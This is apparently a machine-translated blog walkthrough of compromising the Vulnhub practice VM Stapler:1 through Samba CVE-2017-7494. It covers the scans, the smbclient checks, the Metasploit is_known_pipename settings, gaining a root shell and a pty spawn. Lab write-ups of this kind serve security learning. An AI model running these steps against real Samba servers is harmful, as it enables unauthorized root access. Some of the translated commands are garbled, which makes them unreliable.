[CVE-2017-7494]使用Metasploit框架,我试图渗入Stapler:1由于Samba中的脆弱性。

[CVE-2017-7494]使用Metasploit框架,我试图渗入Stapler:1由于Samba中的脆弱性。

我们将向您展示如何使用Metasploit框架在vulnhub上发布的“订书机:1”。
如果您仍然有带有Stapler的环境:1,请参阅 Windows上的VirtualBox上的Stapler:1构建环境!

推荐的参考书
作者:ipusiron
¥2,090 (截至2025/07/13的15:33 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:ipusiron
¥3,850 (截至21:11在07/08/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:贾斯汀·塞茨(Justin Seitz),作者:蒂姆·阿诺德(Tim Arnold),监督者:曼塔尼·诺布塔卡(Mantani Nobutaka),翻译:arai yu,翻译:卡卡拉·hirosei(Kakara Hirosei),翻译:村上
¥3,520 (截至12:26在07/09/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
Amazon Prime Day现在正在进行中! /
亚马逊
目录

什么是Metasploit框架?

Metasploit框架(以下称为Metasploit)是一种主要由Rapid7开发的软件,用于执行穿透性测试。
Kali Linux是世界上最流行的渗透测试框架,因为它是标准配置。

入侵Stapler:1来自Samba脆弱性

这次, CVE -2017-7494 的脆弱性

检查Stapler是否在同一网络上。

检查Stapler是否在同一网络上。
要检查的命令是“ NetDiscover”。

NetDiscover -R 192.168.2.0

只要您目前可以扫描,就可以了;完成的!并确认桑巴在同一网络上。

斯巴达的扫描服务

一种称为Sparta的工具用于扫描在目标端口上运行的服务并收集信息。

从下面的命令开始sparta。

斯巴达

如果以上是“未找到命令”,

APT安装军团

运行以上启动区域。
该区域包含sparta-scripts。

您将看到一个类似于下面的屏幕。
单击“单击此处以添加主机为范围”。

输入您的IP地址,然后单击提交。

单击提交开始扫描,因此请等到NMAP(Stage5)完成。
完成后,您将处于以下状态:

识别版本

在Sparta中,您无法指定Samba的版本,因此我们将使用NMAP来标识该版本。

NMAP -VVV -A -P 139 192.168.2.5

您可以看到该版本为“ 4.3.9-ubuntu”。

检查Metasproit中的攻击模块

检查MetAsproit的攻击模块,以了解您确定的Samba版本。

当我搜索时,我找到了一个与“ CVE -2017-7494”相对应的攻击模块。

在这里,您可以找到成功攻击的三个条件:

  1. 有效的凭据
  2. 可访问的共享中的可写文件夹
  3. 可写文件夹的服务器端路径

接下来,让我们检查一下是否满足条件。

检查“有效凭据”

如果您不需要密码来访问它,则有效的凭据满足要求。

smbclient -L 192.168.2.5输入工作组\ hacklab的密码:

和桑巴一起去。
目前,将要求您提供密码,但请不要输入并按Enter。

这表明满足“有效凭据”条件。

检查“可访问共享中的可写文件夹”

接下来,在可访问的共享中检查可写的文件夹。
如果有一个可访问的,可写的共享文件夹,则可访问份额中的可写文件夹可满足要求。

在适当的位置创建文本文件。内容很好,没有问题。

由于TMP通常没有写限制,因此我将尝试将文件放入TMP中。

smbclient //192.168.2.5/tmp enter workgroup \ hacklab的密码:
放置text.txt

这确保了写入成功,并且还满足了“可访问共享中的可写文件夹”。

检查“可写文件夹的服务器端路径”

最后,检查“可写文件夹的服务器端路径”。
如果可以检查可写入的文件夹的服务器端路径,则可写文件夹的服务器端路径可满足条件。

nmap -su -ss -script smb -enum -shares.nse -p u:137,t:139 192.168.2.5

通过上述,

您可以看到该路径是“ C:\ var \ tmp”。由于另一方是Linux,因此实际上,将其读为“/var/tmp”。
我还找到了路径,因此我还符合“可写文件夹的服务器端路径”的条件。

设置利用

由于满足了所有三个条件,因此我们实际上使用Metasploit进行攻击。
攻击过程如所述。

  1. 启动MSFConsole
  2. 做:使用exploit/linux/samba/is_known_pipeName
  3. 做:设置rhost [ip]
  4. 做:设置目标[目标#]
  5. 做:利用

首先,启动MSFConsole。

MSFCONSOLE

启动后,运行“使用exploit/linux/samba/is_known_pipeName”。

使用exploit/linux/samba/is_known_pipename

现在,让我们显示选项并查看。

显示选项

您可以通过指定所需设置为“是和有效载荷的项目”来攻击。

首先,设置Rhosts和Rport。
在这里,指定有关目标桑巴的信息。

SET RHOST 192.168.2.5 SET RPORT 139

接下来,检查可用的有效载荷。

显示有效载荷

将有效载荷设置为CMD/UNIX/Interact。

设置有效载荷CMD/UNIX/Interact

这完成了利用配置。
可以肯定的是,我会检查显示选项。

实际上,它将入侵

因此,让我们真正闯入。

只需在离开Exproit设置时运行“运行”即可。

跑步

如果显示命令Shell会话1打开,则可以使用root特权访问。

如果MSF6中发生加密错误,请参考以下作为参考。

SET SMB :: ewansprypt false set smb :: protocolversion 1

让我们检查信息。

ID
PWD
LS -LA

开始PTY

这样可以继续这样做是很好的,但是它会干扰横向运动,例如无法进行SSH,因此请务必启动PTY。

只需运行以下命令:

Python -C'进口pty; pty.spawn(“/bin/sh”)'

检查标志

现在,让我们检查一下旗帜并完成它。

CD /根LS -LA

检查flag.txt的内容。

cat flag.txt

就是这样!

最后

这次,由于CVE-2017-7494的脆弱性,我们尝试使用Metasploit框架渗入订书机:1。

Stapler:1还有其他入侵方法。
我们还介绍了其他方法,因此请参考它们。

如果愿意,请分享!

谁写了这篇文章

这是我开始研究信息安全的博客。作为一名新员工,如果您能宽阔地看着,我会很高兴。
还有Teech Lab,这是一个学习编程乐趣的机会,因此,如果您对软件开发感兴趣,请务必看看!

目录